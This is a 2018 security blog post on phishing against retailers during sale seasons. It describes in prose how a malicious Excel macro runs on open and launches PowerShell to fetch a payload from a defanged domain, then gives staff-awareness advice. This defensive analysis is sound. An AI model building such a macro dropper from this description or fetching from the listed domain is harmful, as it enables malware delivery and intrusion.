Home » Security » Phishing Attacks in Retail Business Acts Like Bumper Sale for Attackers

Phishing Attacks in Retail Business Acts Like Bumper Sale for Attackers

author
Published By Kumar Raj
Aswin Vijayan
Approved By Aswin Vijayan
Published On November 16th, 2018
Reading Time 5 Minutes Reading

The post is going to familiarize readers about the phishing attacks held worldwide when retail industries organize season sale. This time period is a big opportunity for hackers to attempt data breaches on targeted industry.

When a season sale gets started, organization’s major focus is on handling the crowd coming on their product selling website. They forget about the cloud information security present on their enterprise cloud due to which the protection bond becomes loose. In simple words, retail business focus gets diverted towards sale instead of maintaining concentration on their security measures. Such kind of scenario results in data leakage that are stored carelessly on cloud. The time of end of shopping festive or season sale is moneymaking period for phishing attackers. It is so because employees are targeting on their online customers to experience them good services. Several challenges are faced by retailer businesses when they have to meet on-time demands of clients. According to the survey from a well-known research laboratory, it is being found that phishing emails are originated with the purpose of targeting retailer business. The message content is designed in such a clever way that they tempt the intelligent managers of the warehouse. Managers are not only the one who is in eyes of attackers. Other entities who are directly or indirectly connected with large retailer enterprises are also the target for intruders.

Purpose of Attack Vector in Phishing Attacks

A means through which hackers gain access over the targeted enterprise network server is known as attack vector. They cause malicious outcome on successful attempt of the cyber threat. The attack vector enables online hackers to decrease the system control, including human element. This kind of vector comes in form of electronic emails with suspicious attachments when it is about phishing attacks.

A Microsoft XLS, XLSX, DOC, or DOCX file with macro code is used as a weapon by attaching it in an email. With the help of file collaboration settings, email attachments get synced with online storage surface of the targeted business. These storage platforms can be any like SaaS applications or third-party apps. The recipient gets forced to open these attachments because they look as if they are similar like the other ones. Hackers design them in such a smart way that a normal user cannot determine whether its suspected attachment or not.

Regular increase in graph of phishing attacks is named as CloudPhishing fanout. The pie chart attached in this post describes the common enterprise cloud products where CloudPhishing is a big cloud computing security challenge. Applications that are configured with these email software are more likely to be impacted. For example – G Suite and MS OneDrive flawlessly consolidate with their respective email clients and hence, files get synced with all end users. Here, the users are the one who is having rights to work with the one synced drive folders.

Deep Analyses of Malicious Documents

The phishing attackers refer a common scenario in which MS Office files are embedded with macros. When an individual opens this file by clicking on it, it prompts an edit option. It is being observed that MS Excel file includes workbook_open() function, which refers to the macro code execution when the document is opened. Initially, the macro code is obfuscated with nature of subroutines in a heavy manner. It comprises of declaration of lengthy variables. All these functions receive call from this workbook_open() function. The Visual Basic opens a command window that invokes PowerShell successively on deobfuscation.

When the PowerShell window gets launched, the cmdlet starts downloading payload from the SSL site (https://lambda[.]sx). This type of site appears like the internet server, which is programmed through GO programming language. The malicious text of document can’t be connected with anywhere, either it is the web server or its proprietor. We assume that website is hacked to host the malicious coding. It is being observed that payload are availed from well-known cloud services and some of the comprised web servers.

Adopt Prevention On Time Instead of Ignoring Them

People all around the world who are using email communication for one or the other cause have to adopt best email security practices. They should never open attachments of those emails, which are received from unknown sender. Consider only the emails that you receive from a well-known sender, rest keep them aside or simply delete them. If you find something suspicious in your email account, immediately contact the administrator without wasting a single second. Use of personal email ids or social media account should be strictly prohibited on premises. This will avoid sharing of business confidential information with external unknown entities. Remember one thing that ‘security from phishing attacks is successful only when employees in an office are trained regarding the same’. Implementation of CASB solution or CSP security settings is incomplete, until and unless users are not taking preventive measures. Till today’s date, there is no machine that can prevent cyber attacks due to human silly errors. So, its time to be active while working on cloud; otherwise in no time things can get out of your hands!